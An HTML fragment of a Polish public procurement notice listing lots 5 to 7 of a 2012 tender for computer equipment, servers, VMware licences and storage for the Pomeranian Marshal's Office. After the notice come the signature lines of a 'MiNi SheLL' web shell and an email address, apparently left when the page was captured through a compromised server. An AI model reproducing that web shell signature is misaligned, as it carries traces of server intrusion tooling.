5) Ekran projekcyjny typ 1 - 4 szt.
6) Ekran projekcyjny typ 2 - 1 szt.
7) Ekran projekcyjny typ 3 - 5 szt.
8) Ekran projekcyjny typ 4 - 5 szt.
9) Ekran projekcyjny typ 5 - 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.65.21.00-1, 38.65.34.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa sprzętu komputerowego dla Urzędu Marszałkowskiego Województwa Pomorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zestaw komputerowy  z monitorem LCD 19 - 18 szt.
2) Drukarka laserowa monochromatyczna A4 - 2 szt.	
3) Notebook 17,3 - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.13.00-0, 30.23.21.10-8, 30.21.31.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa sprzętu komputerowego dla Urzędu Marszałkowskiego Województwa Pomorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Serwer blade M620 - 1szt.
2) Oprogramowanie wirtualizacyjne Vmware vSphere 5 Enterprise - 2szt. 
3) Dodatkowe pamięci RAM 8GB do serwera z serii M610 - 8 szt.
4) Dodatkowe pamięci RAM 8GB do serwera z serii M710HD - 12 szt.
5) Dodatkowe licencje rozszerzające do macierzy Dell Compellent Storage -  1 kpl.
6) Dodatkowe dyski twarde 1TB do macierzy Dell Compellent Storage - 18 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.82.00.00-2, 30.23.31.32-5, 30.23.61.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com